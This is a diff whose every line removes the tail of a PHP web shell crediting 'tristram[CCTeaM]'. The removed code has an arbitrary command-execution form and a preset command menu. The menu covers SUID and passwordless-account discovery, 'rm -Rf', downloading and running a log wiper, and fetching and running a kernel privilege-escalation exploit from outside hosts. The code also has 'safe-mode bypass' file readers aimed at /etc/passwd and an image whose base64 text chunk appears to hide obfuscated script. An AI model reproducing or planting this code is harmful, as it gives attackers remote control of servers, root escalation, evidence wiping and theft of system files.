-"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".

-"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".

-"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",

-"ext_avi"=>

-"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".

-"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".

-"PYXCyg+V2i44XeRmSfYqsGhAAgA7",

-"ext_cgi"=>

-"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".

-"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".

-"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".

-"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".

-"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".

-"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".

-"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".

-"RYtMAgEAOw==",

-"ext_cmd"=>

-"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".

-"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".

-"dmrYAMn1onq/YKpjvEgAADs=",

-"ext_cpp"=>

-"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".

-"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".

-"Eq7YrLDE7a4SADs=",

-"ext_ini"=>

-"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".

-"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".

-"SnEjgPVarHEHgrB43JvszsQEADs=",

-"ext_diz"=>

-"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".

-"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".

-"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".

-"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".

-"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".

-"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".

-"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".

-"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".

-"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".

-"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".

-"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".

-"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".

-"Ow==",

-"ext_doc"=>

-"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".

-"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".

-"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",

-"ext_exe"=>

-"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".

-"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".

-"xhIAOw==",

-"ext_h"=>

-"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".

-"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".

-"Wq/NknbbSgAAOw==",

-"ext_hpp"=>

-"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".

-"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".

-"UqUagnbLdZa+YFcCADs=",

-"ext_htaccess"=>

-"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".

-"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".

-"AAA7",

-"ext_html"=>

-"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".

-"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".

-"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".

-"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".

-"ADs=",

-"ext_jpg"=>

-"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".

-"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".

-"FxEAOw==",

-"ext_js"=>

-"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".

-"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".

-"a00AjYYBbc/o9HjNniUAADs=",

-"ext_lnk"=>

-"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".

-"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".

-"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".

-"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".

-"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".

-"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".

-"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".

-"ADs=",

-"ext_log"=>

-"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".

-"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",

-"ext_php"=>

-"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".

-"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",

-"ext_pl"=>

-"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".

-"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",

-"ext_swf"=>

-"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".

-"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".

-"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".

-"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".

-"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",

-"ext_tar"=>

-"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".

-"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".

-"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".

-"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".

-"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".

-"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".

-"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".

-"u4tLAgEAOw==",

-"ext_txt"=>

-"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".

-"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".

-"UpPWG3Ig6Hq/XmRjuZwkAAA7",

-"ext_wri"=>

-"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".

-"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",

-"ext_xml"=>

-"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".

-"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".

-"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".

-"IQA7"

- );

- //For simple size- and speed-optimization.

- $imgequals = array(

-  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),

-  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),

-  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),

-  "ext_html"=>array("ext_html","ext_htm"),

-  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),

-  "ext_lnk"=>array("ext_lnk","ext_url"),

-  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),

-  "ext_doc"=>array("ext_doc","ext_dot"),

-  "ext_js"=>array("ext_js","ext_vbs"),

-  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),

-  "ext_wri"=>array("ext_wri","ext_rtf"),

-  "ext_swf"=>array("ext_swf","ext_fla"),

-  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),

-  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")

- );

- if (!$getall)

- {

-  header("Content-type: image/gif");

-  header("Cache-control: public");

-  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));

-  header("Cache-control: max-age=".(60*60*24*7));

-  header("Last-Modified: ".date("r",filemtime(__FILE__)));

-  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}

-  if (empty($images[$img])) {$img = "small_unk";}

-  if (in_array($img,$ext_tar)) {$img = "ext_tar";}

-  echo base64_decode($images[$img]);

- }

- else

- {

-  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}

-  natsort($images);

-  $k = array_keys($images);

-  echo  "<center>";

-  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}

-  echo "</center>";

- }

- exit;

-}

-if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}

-?>

-</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>

-<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>

-<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>

-<br>

-<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>

-<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr>

-<tr>

-  <td width="50%" height="83" valign="top"><center>

-    <div align="center">Useful Commands 

-    </div>

-    <form action="<?php echo $surl; ?>">

-      <div align="center">

-        <input type=hidden name=act value="cmd">

-        <input type=hidden name="d" value="<?php echo $dispd; ?>">

-          <SELECT NAME="cmd">

-            <OPTION VALUE="uname -a">Kernel version

-              <OPTION VALUE="w">Logged in users

-                <OPTION VALUE="lastlog">Last to connect

-                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins

-                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!

-                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?

-                    <OPTION VALUE="which wget curl w3m lynx">Downloaders?

-                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO

-                    <OPTION VALUE="netstat -atup | grep IST">Open ports

-                    <OPTION VALUE="locate gcc">gcc installed?

-                                        <OPTION VALUE="rm -Rf">Format box (DANGEROUS)

-                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)

-                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2

-                    <OPTION VALUE="./zap2">WIPELOGS PT3

-                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)

-                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)

-                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)

-                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)

-                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)

-                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)

-                  </SELECT>

-        <input type=hidden name="cmd_txt" value="1">

-        &nbsp;

-        <input type=submit name=submit value="Execute">

-          <br>

-        Warning. Kernel may be alerted using higher levels </div>

-    </form>

-    </td>

-  <td width="50%" height="83" valign="top"><center>

-   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">

-      <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>">

-      <input type="hidden" name="client" value="firefox-a">

-          <input type="hidden" name="rls" value="org.mozilla:en-US:official">

-          <input type="hidden" name="hl" value="en">

-          <input type="hidden" name="hs" value="b7p">

-          <input type=submit name="btnG" VALUE="Search">

-    </form></center>

-    </td>

-</tr></TABLE><br>

-<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>

-<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr>

-<tr>

-  <td width="50%" height="83" valign="top"><center>

-    <div align="center">Php Safe-Mode Bypass (Read Files)

-    </div><br>

-    <form action="<?php echo $surl; ?>">

-      <div align="center">

-      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>

-      

-      

-      

-           

-      

-      

-      <?

-      

-      function rsg_read()

-        {       

-        $test="";

-        $temp=tempnam($test, "cx");

-        $file=$_GET['file'];    

-        $get=htmlspecialchars($file);

-        echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";

-        if(copy("compress.zlib://".$file, $temp)){

-        $fichier = fopen($temp, "r");

-        $action = fread($fichier, filesize($temp));

-        fclose($fichier);

-        $source=htmlspecialchars($action);

-        echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";

-        unlink($temp);

-        } else {

-        die("<FONT COLOR=\"RED\"><CENTER>Sorry... File

-        <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have

-        access.</CENTER></FONT>");

-                        }

-        echo "</div>";

-        }

-        

-        if(isset($_GET['file']))

-{

-rsg_read();

-}

-        

-        ?>

-        

-        <?

-        

-        function rsg_glob()

-{

-$chemin=$_GET['directory'];

-$files = glob("$chemin*");

-echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";

-foreach ($files as $filename) {

-        echo "<pre>";

-   echo "$filename\n";

-   echo "</pre>";

-}

-}

-

-if(isset($_GET['directory']))

-{

-rsg_glob();

-}

-

-?>

-

-          <br>

-      </div>

-    </form>

-    </td>

-  <td width="50%" height="83" valign="top"><center>

-   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>">

-      <div align="center"><br>

-      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>

-

-    </form></center>

-    </td>

-</tr></TABLE><br>

-<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHO